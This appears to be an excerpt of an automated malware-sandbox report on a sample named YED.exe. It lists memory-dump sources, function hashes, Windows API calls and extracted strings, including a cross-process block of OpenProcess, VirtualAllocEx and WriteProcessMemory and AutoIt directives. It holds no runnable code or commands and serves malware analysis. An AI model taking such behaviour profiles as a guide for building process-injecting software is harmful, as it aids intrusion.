                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 9167c2f76817a606744c1013649d4f9c83c6de7f309a7ea36dcbdbc9895e6c4d
                                                                                                                                                • Instruction ID: 75487a5bb8d87c1354421e7a5b0e6b3b9d0094d02adb869f7c872ccbd8a4713e
                                                                                                                                                • Opcode Fuzzy Hash: 9167c2f76817a606744c1013649d4f9c83c6de7f309a7ea36dcbdbc9895e6c4d
                                                                                                                                                • Instruction Fuzzy Hash: 62F03632965206EB9629EF66F9C5C16BBDDBB447107F41C06F048D7541C730FCA0CA64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 002422BE
                                                                                                                                                  • Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
                                                                                                                                                  • Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0
                                                                                                                                                • _free.LIBCMT ref: 002422D0
                                                                                                                                                • _free.LIBCMT ref: 002422E3
                                                                                                                                                • _free.LIBCMT ref: 002422F4
                                                                                                                                                • _free.LIBCMT ref: 00242305
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 880e6aa0d25e6108f3bba710651bd336886c5ff64b1d5d641442e813137879fd
                                                                                                                                                • Instruction ID: 9994fca1a3738922489f828652c00a4dffbad11a63dd5b24fa9dc467554c7afa
                                                                                                                                                • Opcode Fuzzy Hash: 880e6aa0d25e6108f3bba710651bd336886c5ff64b1d5d641442e813137879fd
                                                                                                                                                • Instruction Fuzzy Hash: 7BF05EB08A11A1DB9B17AF57BC8980C3B68F7187607A0151BF814DA2B1CB711876EFE4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2625713937-0
                                                                                                                                                • Opcode ID: cfc2c73a7e3a6d843aabe25e7faf778942eba344992c9b7f16dd7ad7355bc88f
                                                                                                                                                • Instruction ID: 49bab884c6149a1431e4f22809f08857a8115d952b1e349a4e8e645b7da67da3
                                                                                                                                                • Opcode Fuzzy Hash: cfc2c73a7e3a6d843aabe25e7faf778942eba344992c9b7f16dd7ad7355bc88f
                                                                                                                                                • Instruction Fuzzy Hash: 8AF03C30055285EBDB125FA5FD5C7643BA5EB02322F148224F429590F2CB7589B5DF20
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __freea$_free
                                                                                                                                                • String ID: a/p$am/pm
                                                                                                                                                • API String ID: 3432400110-3206640213
                                                                                                                                                • Opcode ID: 3c6d27a78ddfb579001944e1c75b2e0cdd2216b4021b971f668a3e9a5bfae2de
                                                                                                                                                • Instruction ID: e6bed07876e556486b0e5cfd43987b8d988da083d48032861c0ce2a6f30cdb27
                                                                                                                                                • Opcode Fuzzy Hash: 3c6d27a78ddfb579001944e1c75b2e0cdd2216b4021b971f668a3e9a5bfae2de
                                                                                                                                                • Instruction Fuzzy Hash: A3D1F231930207DADB2C9F68C895BFABBB0EF05700F244199E915AB654D3B59DF0CB91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00230242: EnterCriticalSection.KERNEL32(002E070C,002E1884,?,?,0022198B,002E2518,?,?,?,002112F9,00000000), ref: 0023024D
                                                                                                                                                  • Part of subcall function 00230242: LeaveCriticalSection.KERNEL32(002E070C,?,0022198B,002E2518,?,?,?,002112F9,00000000), ref: 0023028A
                                                                                                                                                  • Part of subcall function 002300A3: __onexit.LIBCMT ref: 002300A9
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00296238
                                                                                                                                                  • Part of subcall function 002301F8: EnterCriticalSection.KERNEL32(002E070C,?,?,00228747,002E2514), ref: 00230202
                                                                                                                                                  • Part of subcall function 002301F8: LeaveCriticalSection.KERNEL32(002E070C,?,00228747,002E2514), ref: 00230235
                                                                                                                                                  • Part of subcall function 0028359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002835E4
                                                                                                                                                  • Part of subcall function 0028359C: LoadStringW.USER32(002E2390,?,00000FFF,?), ref: 0028360A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                                                                • String ID: x#.$x#.$x#.
                                                                                                                                                • API String ID: 1072379062-2340457610
                                                                                                                                                • Opcode ID: 184e0f47ae070dfc9a5855e4b004922a491426b99a6d49aaed4954f468b1b617
                                                                                                                                                • Instruction ID: 78aebe95c70378214a905a78c79470944012b544066a2d46b7051d57d5a01348
                                                                                                                                                • Opcode Fuzzy Hash: 184e0f47ae070dfc9a5855e4b004922a491426b99a6d49aaed4954f468b1b617
                                                                                                                                                • Instruction Fuzzy Hash: 99C17B71A20106AFDF24DF98C894EBEB7F9EF48300F558069E9059B291DB70E965CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00248B6E
                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00248B7A
                                                                                                                                                • __dosmaperr.LIBCMT ref: 00248B81
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                                                                                • String ID: .#
                                                                                                                                                • API String ID: 2434981716-197210044
                                                                                                                                                • Opcode ID: adcc6fd5105ec10fc55ea8ed203e79b8866256888e351573d7ceaa8d721075c8
                                                                                                                                                • Instruction ID: eb4e2219a58afd81e4a1160ce853b91b6da76087db3f5711005ee07970c142b8
                                                                                                                                                • Opcode Fuzzy Hash: adcc6fd5105ec10fc55ea8ed203e79b8866256888e351573d7ceaa8d721075c8
                                                                                                                                                • Instruction Fuzzy Hash: 05419170634055AFDB289F24DC84A7D7FD5DB45308F288199F884CB542DE71CC638750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0027B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002721D0,?,?,00000034,00000800,?,00000034), ref: 0027B42D
                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00272760
                                                                                                                                                  • Part of subcall function 0027B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0027B3F8
                                                                                                                                                  • Part of subcall function 0027B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0027B355
                                                                                                                                                  • Part of subcall function 0027B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00272194,00000034,?,?,00001004,00000000,00000000), ref: 0027B365
                                                                                                                                                  • Part of subcall function 0027B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00272194,00000034,?,?,00001004,00000000,00000000), ref: 0027B37B
                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002727CD
                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0027281A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                                • Opcode ID: d445473ab77be2c9d68b511d5444775d815ba461ad48665b718374ad57345d98
                                                                                                                                                • Instruction ID: f2d6dbb5d705826bf054d9d827ef521c04f7f312875aa4c09472499e12d2cdd0
                                                                                                                                                • Opcode Fuzzy Hash: d445473ab77be2c9d68b511d5444775d815ba461ad48665b718374ad57345d98
                                                                                                                                                • Instruction Fuzzy Hash: 12416D72900218AFDB15DFA4CD45BDEBBB8AF05700F108095FA59B7181DB706E99CFA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\YED.exe,00000104), ref: 00241769
                                                                                                                                                • _free.LIBCMT ref: 00241834
                                                                                                                                                • _free.LIBCMT ref: 0024183E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                                • API String ID: 2506810119-2101642235
                                                                                                                                                • Opcode ID: 72c3d95d5fb4f8278b0f19747587eb9ef813bb987dd09a4c47fbac6daf44a29a
                                                                                                                                                • Instruction ID: 58ce2db1787f190614d8064d9424f3b7ed4bb189c86d81bc9da08e6e46841f83
                                                                                                                                                • Opcode Fuzzy Hash: 72c3d95d5fb4f8278b0f19747587eb9ef813bb987dd09a4c47fbac6daf44a29a
                                                                                                                                                • Instruction Fuzzy Hash: 2A31AE71A50258EBDB29DF9ADC85D9EBBFCEB85310B104166F904DB211D7B08EA0CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                                                • String ID: 0
                                                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                                                • Opcode ID: 1d9d6a3f1c86db17cfa1f6a754e7b4b3361b0206c2b53b7739883f5af07ec429
                                                                                                                                                • Instruction ID: f0f1941c176447693314a9e84ad6814b584fd381efeae8eb885880c02f288316
                                                                                                                                                • Opcode Fuzzy Hash: 1d9d6a3f1c86db17cfa1f6a754e7b4b3361b0206c2b53b7739883f5af07ec429
                                                                                                                                                • Instruction Fuzzy Hash: 7541C3712143029FD720DF34D885B5ABBE4AF85320F20C6ADF9A9972D1D770E954CB62
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002A44AA
                                                                                                                                                • GetWindowLongW.USER32 ref: 002A44C7
                                                                                                                                                • SetWindowLongW.USER32 ref: 002A44D7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Long
                                                                                                                                                • String ID: SysTreeView32
                                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                                • Opcode ID: 65bb59341124ee77542515c5c7c9c4c86c5b9909c99a45179f9b8ec0b1eea7fb
                                                                                                                                                • Instruction ID: 5ee0cfac16f5b5d69f87e4cad696e45c333f85de07451b58192a62ec1f02feda
                                                                                                                                                • Opcode Fuzzy Hash: 65bb59341124ee77542515c5c7c9c4c86c5b9909c99a45179f9b8ec0b1eea7fb
                                                                                                                                                • Instruction Fuzzy Hash: E631A231220606AFDF209F78DC45BDA77A9EB9A334F204725F975921D0DBB0EC609B50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SysReAllocString.OLEAUT32(?,?), ref: 00276EED
                                                                                                                                                • VariantCopyInd.OLEAUT32(?,?), ref: 00276F08
                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00276F12
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Variant$AllocClearCopyString
                                                                                                                                                • String ID: *j'
                                                                                                                                                • API String ID: 2173805711-4035128418
                                                                                                                                                • Opcode ID: 72f3d48d040188f5f133464c7dc1408d8526a9f3cf6101bec31e2bad73743006
                                                                                                                                                • Instruction ID: 37e3092a84006c882177a10024da6b6d5bf693d959bb303fdc742eb6fd7fe349
                                                                                                                                                • Opcode Fuzzy Hash: 72f3d48d040188f5f133464c7dc1408d8526a9f3cf6101bec31e2bad73743006
                                                                                                                                                • Instruction Fuzzy Hash: B931F331624606DFCB05AFA4E85A8BD37B6EF85300B2044A8F8074B6A1CB709D71CFD1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0029335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00293077,?,?), ref: 00293378
                                                                                                                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0029307A
                                                                                                                                                • _wcslen.LIBCMT ref: 0029309B
                                                                                                                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 00293106
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                • String ID: 255.255.255.255
                                                                                                                                                • API String ID: 946324512-2422070025
                                                                                                                                                • Opcode ID: aac933c6fa4ae11fd876e1777863d38e0ac0ca3375c11841724349b0fe383da3
                                                                                                                                                • Instruction ID: bbe233f8258a73efbfbf7684232196f9288b4e1513d819771c7ef333820608eb
                                                                                                                                                • Opcode Fuzzy Hash: aac933c6fa4ae11fd876e1777863d38e0ac0ca3375c11841724349b0fe383da3
                                                                                                                                                • Instruction Fuzzy Hash: CD31E7352102029FCF20CF68C485EAA77F0EF15314F248059E9158B3A2DB72EE55CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002A4705
                                                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002A4713
                                                                                                                                                • DestroyWindow.USER32 ref: 002A471A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                                                • Opcode ID: 03b203d8f0564ee155109a4fcb61a7e187fb0f3712dffaa16eb1f3dbfbbad178
                                                                                                                                                • Instruction ID: 0ceeeef8baf054e57380654d18a48c668f09c14d4417e8c9de8ec48d8a2f1755
                                                                                                                                                • Opcode Fuzzy Hash: 03b203d8f0564ee155109a4fcb61a7e187fb0f3712dffaa16eb1f3dbfbbad178
                                                                                                                                                • Instruction Fuzzy Hash: 6F2192B5610245AFDB10EF68ECC5DBB77ADEB9B794B140059F9009B261DB70EC21CA60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen
                                                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                • API String ID: 176396367-2734436370
                                                                                                                                                • Opcode ID: 47f9ae7d287150d761063ee206a8a03a7ede1b0f9e360cc5ca9de115cb069995
